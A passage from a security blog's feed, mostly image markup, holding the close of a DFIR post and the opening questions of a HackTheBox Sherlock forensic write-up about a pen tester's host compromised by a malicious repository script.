srcset="https://substackcdn.com/image/fetch/$s_!WtvM!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbe912bd-f941-482a-8495-bf202dbf6661_2078x733.png 424w, https://substackcdn.com/image/fetch/$s_!WtvM!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbe912bd-f941-482a-8495-bf202dbf6661_2078x733.png 848w, https://substackcdn.com/image/fetch/$s_!WtvM!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbe912bd-f941-482a-8495-bf202dbf6661_2078x733.png 1272w, https://substackcdn.com/image/fetch/$s_!WtvM!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbe912bd-f941-482a-8495-bf202dbf6661_2078x733.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!WtvM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbe912bd-f941-482a-8495-bf202dbf6661_2078x733.png" width="1456" height="514" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/cbe912bd-f941-482a-8495-bf202dbf6661_2078x733.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:514,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:133264,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!WtvM!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbe912bd-f941-482a-8495-bf202dbf6661_2078x733.png 424w, https://substackcdn.com/image/fetch/$s_!WtvM!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbe912bd-f941-482a-8495-bf202dbf6661_2078x733.png 848w, https://substackcdn.com/image/fetch/$s_!WtvM!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbe912bd-f941-482a-8495-bf202dbf6661_2078x733.png 1272w, https://substackcdn.com/image/fetch/$s_!WtvM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcbe912bd-f941-482a-8495-bf202dbf6661_2078x733.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><div><hr></div><h3><strong>Conclusion:</strong></h3><p>Following these steps allows you to systematically identify the malicious process, its behavior, and its timeline, helping the DFIR team perform root cause analysis and containment. Each tool used plays a critical role in building the timeline and gathering forensic evidence for further investigation.</p>]]></content:encoded></item><item><title><![CDATA[HackTheBox: Psittaciformes]]></title><description><![CDATA[Sherlock]]></description><link>https://www.byteberzerker.com/p/hackthebox-psittaciformes</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hackthebox-psittaciformes</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Wed, 08 Jan 2025 01:21:39 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!8aoo!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1603d03-6e3f-4e48-92b9-0552f6c3821c_572x797.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Objective:</strong></p><p>Forela's internal security team conducted penetration testing on their networks. Following the tests, it was discovered that a host may have been compromised. The goal of this investigation is to verify how the compromise occurred using the retrospective collection provided.</p><p><strong>1. What is the name of the repository utilized by the Pen Tester within Forela that resulted in the compromise of his host?</strong></p><p>To address this question, we need to thoroughly examine the provided directories. Unzipping all contents, including those in subdirectories, is crucial, as it will give us access to the relevant repository that led to the host's compromise.</p><p></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!8aoo!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1603d03-6e3f-4e48-92b9-0552f6c3821c_572x797.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!8aoo!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1603d03-6e3f-4e48-92b9-0552f6c3821c_572x797.png 424w, https://substackcdn.com/image/fetch/$s_!8aoo!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1603d03-6e3f-4e48-92b9-0552f6c3821c_572x797.png 848w, https://substackcdn.com/image/fetch/$s_!8aoo!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1603d03-6e3f-4e48-92b9-0552f6c3821c_572x797.png 1272w, https://substackcdn.com/image/fetch/$s_!8aoo!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1603d03-6e3f-4e48-92b9-0552f6c3821c_572x797.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!8aoo!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1603d03-6e3f-4e48-92b9-0552f6c3821c_572x797.png" width="572" height="797" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c1603d03-6e3f-4e48-92b9-0552f6c3821c_572x797.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:797,&quot;width&quot;:572,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:110021,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!8aoo!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1603d03-6e3f-4e48-92b9-0552f6c3821c_572x797.png 424w, https://substackcdn.com/image/fetch/$s_!8aoo!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1603d03-6e3f-4e48-92b9-0552f6c3821c_572x797.png 848w, https://substackcdn.com/image/fetch/$s_!8aoo!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1603d03-6e3f-4e48-92b9-0552f6c3821c_572x797.png 1272w, https://substackcdn.com/image/fetch/$s_!8aoo!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc1603d03-6e3f-4e48-92b9-0552f6c3821c_572x797.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!qgRT!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aa49828-2d80-4de5-a58a-0461317fbc5a_567x870.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!qgRT!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aa49828-2d80-4de5-a58a-0461317fbc5a_567x870.png 424w, https://substackcdn.com/image/fetch/$s_!qgRT!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aa49828-2d80-4de5-a58a-0461317fbc5a_567x870.png 848w, https://substackcdn.com/image/fetch/$s_!qgRT!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aa49828-2d80-4de5-a58a-0461317fbc5a_567x870.png 1272w, https://substackcdn.com/image/fetch/$s_!qgRT!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aa49828-2d80-4de5-a58a-0461317fbc5a_567x870.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!qgRT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aa49828-2d80-4de5-a58a-0461317fbc5a_567x870.png" width="567" height="870" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1aa49828-2d80-4de5-a58a-0461317fbc5a_567x870.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:870,&quot;width&quot;:567,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:100791,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!qgRT!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aa49828-2d80-4de5-a58a-0461317fbc5a_567x870.png 424w, https://substackcdn.com/image/fetch/$s_!qgRT!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aa49828-2d80-4de5-a58a-0461317fbc5a_567x870.png 848w, https://substackcdn.com/image/fetch/$s_!qgRT!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aa49828-2d80-4de5-a58a-0461317fbc5a_567x870.png 1272w, https://substackcdn.com/image/fetch/$s_!qgRT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aa49828-2d80-4de5-a58a-0461317fbc5a_567x870.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><p><strong>2. What is the name of the malicious function within the script ran by the Pen Tester?</strong></p><p>The shell script is not directly available in the logs. To retrieve it, we must pull the script using git. Once obtained, examining its contents will reveal the name of the malicious function that was executed.</p><p></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ZEB6!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd1a956e9-5c47-4d51-a647-c4eb8bdd9a25_584x721.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ZEB6!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd1a956e9-5c47-4d51-a647-c4eb8bdd9a25_584x721.png 424w, https://substackcdn.com/image/fetch/$s_!ZEB6!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd1a956e9-5c47-4d51-a647-c4eb8bdd9a25_584x721.png 848w, https://substackcdn.com/image/fetch/$s_!ZEB6!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd1a956e9-5c47-4d51-a647-c4eb8bdd9a25_584x721.png 1272w, https://substackcdn.com/image/fetch/$s_!ZEB6!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd1a956e9-5c47-4d51-a647-c4eb8bdd9a25_584x721.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ZEB6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd1a956e9-5c47-4d51-a647-c4eb8bdd9a25_584x721.png" width="584" height="721" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d1a956e9-5c47-4d51-a647-c4eb8bdd9a25_584x721.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:721,&quot;width&quot;:584,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:100135,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ZEB6!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd1a956e9-5c47-4d51-a647-c4eb8bdd9a25_584x721.png 424w, https://substackcdn.com/image/fetch/$s_!ZEB6!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd1a956e9-5c47-4d51-a647-c4eb8bdd9a25_584x721.png 848w, https://substackcdn.com/image/fetch/$s_!ZEB6!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd1a956e9-5c47-4d51-a647-c4eb8bdd9a25_584x721.png 1272w, https://substackcdn.com/image/fetch/$s_!ZEB6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd1a956e9-5c47-4d51-a647-c4eb8bdd9a25_584x721.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!GqJa!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf914506-2d88-441f-b6b8-c9ec65021b44_796x538.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!GqJa!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf914506-2d88-441f-b6b8-c9ec65021b44_796x538.png 424w, https://substackcdn.com/image/fetch/$s_!GqJa!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf914506-2d88-441f-b6b8-c9ec65021b44_796x538.png 848w, https://substackcdn.com/image/fetch/$s_!GqJa!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf914506-2d88-441f-b6b8-c9ec65021b44_796x538.png 1272w, https://substackcdn.com/image/fetch/$s_!GqJa!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf914506-2d88-441f-b6b8-c9ec65021b44_796x538.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!GqJa!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf914506-2d88-441f-b6b8-c9ec65021b44_796x538.png" width="796" height="538" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bf914506-2d88-441f-b6b8-c9ec65021b44_796x538.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:538,&quot;width&quot;:796,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:83278,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!GqJa!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf914506-2d88-441f-b6b8-c9ec65021b44_796x538.png 424w, https://substackcdn.com/image/fetch/$s_!GqJa!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf914506-2d88-441f-b6b8-c9ec65021b44_796x538.png 848w, https://substackcdn.com/image/fetch/$s_!GqJa!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf914506-2d88-441f-b6b8-c9ec65021b44_796x538.png 1272w, https://substackcdn.com/image/fetch/$s_!GqJa!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbf914506-2d88-441f-b6b8-c9ec65021b44_796x538.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><p><strong>3. What is the password of the zip file downloaded within the malicious function?</strong></p><p>In the script, a $PASSWORD variable is passed, which is constructed using $part1 and $part2. To determine the password, we need to identify the values of $part1 and $part2, possibly decoding them using a tool like CyberChef.</p><p></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!3leS!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd48602a9-3c17-4995-b472-f5282f7377e8_1868x637.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!3leS!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd48602a9-3c17-4995-b472-f5282f7377e8_1868x637.png 424w, https://substackcdn.com/image/fetch/$s_!3leS!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd48602a9-3c17-4995-b472-f5282f7377e8_1868x637.png 848w, https://substackcdn.com/image/fetch/$s_!3leS!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd48602a9-3c17-4995-b472-f5282f7377e8_1868x637.png 1272w, https://substackcdn.com/image/fetch/$s_!3leS!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd48602a9-3c17-4995-b472-f5282f7377e8_1868x637.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!3leS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd48602a9-3c17-4995-b472-f5282f7377e8_1868x637.png" width="1456" height="497" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d48602a9-3c17-4995-b472-f5282f7377e8_1868x637.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:497,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:70056,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!3leS!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd48602a9-3c17-4995-b472-f5282f7377e8_1868x637.png 424w, 